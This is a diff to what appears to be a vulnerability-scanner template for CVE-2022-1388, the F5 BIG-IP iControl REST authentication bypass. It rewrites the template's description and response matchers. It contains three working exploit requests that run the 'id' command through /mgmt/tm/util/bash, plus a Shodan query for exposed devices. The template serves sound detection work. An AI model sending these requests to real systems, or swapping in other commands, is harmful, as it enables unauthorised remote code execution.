Rewrote matchers due to vulnerable use-case I which had a slightly different matcher. Minor formatting and style changes.

cves/2022/CVE-2022-1388.yaml

@@ -1,18 +1,17 @@
 id: CVE-2022-1388
 
 info:
-  name: F5 BIG-IP iControl REST Auth Bypass RCE
+  name: F5 BIG-IP iControl - REST Auth Bypass RCE
   author: dwisiswant0,Ph33r
   severity: critical
   description: |
-    This vulnerability may allow an unauthenticated attacker
+    This F5 BIG-IP vulnerability can allow an unauthenticated attacker
     with network access to the BIG-IP system through the management
-    port and/or self IP addresses to execute arbitrary system commands,
+    port and/or self IP addresses to execute arbitrary system commands.
-    create or delete files, or disable services. There is no data plane
-    exposure; this is a control plane issue only.
   reference:
     - https://twitter.com/GossiTheDog/status/1523566937414193153
     - https://support.f5.com/csp/article/K23605346
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.80
@@ -21,63 +20,86 @@ info:
   metadata:
     shodan-query: http.title:"BIG-IP®-+Redirect" +"Server"
     verified: true
-  tags: bigip,cve,cve2022,rce,mirai
+  tags: f5,bigip,cve,cve2022,rce,mirai
 
 variables:
   auth: "admin:"
 
 requests:
   - raw:
-      - |
+      - |+
         POST /mgmt/tm/util/bash HTTP/1.1
         Host: {{Hostname}}
         Connection: keep-alive, X-F5-Auth-Token
         X-F5-Auth-Token: a
         Authorization: Basic {{base64(auth)}}
         Content-Type: application/json
+
         {
-          "command": "run",
+             "command": "run",
-          "utilCmdArgs": "-c id"
+             "utilCmdArgs": "-c id"
         }
+
+    matchers-condition: and
     matchers:
       - type: word
         words:
-          - "commandResult"
           - "uid="
         condition: and
+      - type: word
+        words:
+          - "context=system_u"
+          - "commandResult"
+        condition: or
+
   - raw:
-      - |
+      - |+
         POST /mgmt/tm/util/bash HTTP/1.1
         Host: localhost
         Connection: keep-alive, X-F5-Auth-Token
         X-F5-Auth-Token: a
         Authorization: Basic {{base64(auth)}}
         Content-Type: application/json
+
         {
           "command": "run",
           "utilCmdArgs": "-c id"
         }
+
+    matchers-condition: and
     matchers:
       - type: word
         words:
-          - "commandResult"
           - "uid="
         condition: and
+      - type: word
+        words:
+          - "context=system_u"
+          - "commandResult"
+        condition: or
+
   - raw:
-      - |
+      - |+
         POST /mgmt/tm/util/bash HTTP/1.1
         Host: localhost:8100
         Connection: keep-alive, X-F5-Auth-Token
         X-F5-Auth-Token: a
         Authorization: Basic {{base64(auth)}}
         Content-Type: application/json
+
         {
           "command": "run",
           "utilCmdArgs": "-c id"
         }
+
+    matchers-condition: and
     matchers:
       - type: word
         words:
-          - "commandResult"
           - "uid="
         condition: and
+      - type: word
+        words:
+          - "context=system_u"
+          - "commandResult"
+        condition: or